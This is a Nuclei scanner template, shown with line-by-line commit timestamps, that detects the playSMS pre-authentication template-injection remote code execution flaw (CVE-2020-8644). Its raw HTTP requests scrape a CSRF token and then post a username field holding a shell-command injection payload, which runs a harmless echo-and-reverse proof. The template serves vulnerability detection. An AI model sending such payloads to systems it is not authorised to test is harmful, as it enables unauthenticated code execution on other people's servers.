2022-07-05 20:39:27 +00:00
|
|
|
id: CVE-2020-8644
|
|
|
|
|
|
|
|
info:
|
2022-07-10 05:26:48 +00:00
|
|
|
name: playSMS <1.4.3 - Remote Code Execution
|
2022-07-05 20:39:27 +00:00
|
|
|
author: dbrwsky
|
|
|
|
severity: critical
|
2022-07-08 19:07:55 +00:00
|
|
|
description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
|
2023-09-06 12:22:36 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.
|
2022-07-05 20:39:27 +00:00
|
|
|
reference:
|
|
|
|
- https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
|
2022-07-06 05:00:57 +00:00
|
|
|
- https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
|
2022-07-08 19:07:55 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-8644
|
2023-04-12 10:55:48 +00:00
|
|
|
- http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704
|
2022-07-06 08:55:00 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2020-8644
|
2023-07-11 19:49:27 +00:00
|
|
|
cwe-id: CWE-94
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.95356
|
|
|
|
epss-percentile: 0.99358
|
2023-09-06 12:22:36 +00:00
|
|
|
cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: playsms
|
|
|
|
product: playsms
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce
|
2022-07-05 20:39:27 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-05 20:39:27 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Origin: {{BaseURL}}
|
|
|
|
- |
|
|
|
|
POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Origin: {{BaseURL}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
2022-07-06 05:00:57 +00:00
|
|
|
X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=
|
2022-07-06 04:45:33 +00:00
|
|
|
|
2022-10-07 21:27:25 +00:00
|
|
|
host-redirects: true
|
2022-07-06 05:00:57 +00:00
|
|
|
max-redirects: 2
|
|
|
|
|
2022-07-06 04:45:33 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
2022-07-06 05:00:57 +00:00
|
|
|
words:
|
|
|
|
- '4468-0202-EVC'
|
2022-07-06 04:45:33 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: xpath
|
|
|
|
name: csrf
|
|
|
|
internal: true
|
|
|
|
xpath:
|
|
|
|
- /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
|
|
|
|
attribute: value
|
|
|
|
part: body
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4b0a00483046022100e8a0aa9b72c7bcd55f9163162b0bd8f9fb7a6ca107e55a46fa5b22f42ff1d194022100c8e13cd8e692b9430c30e0ffd48feda71f8863a9947a6454d0082f1b3ef8b598:922c64590222798bb761d5b6d8e72950
|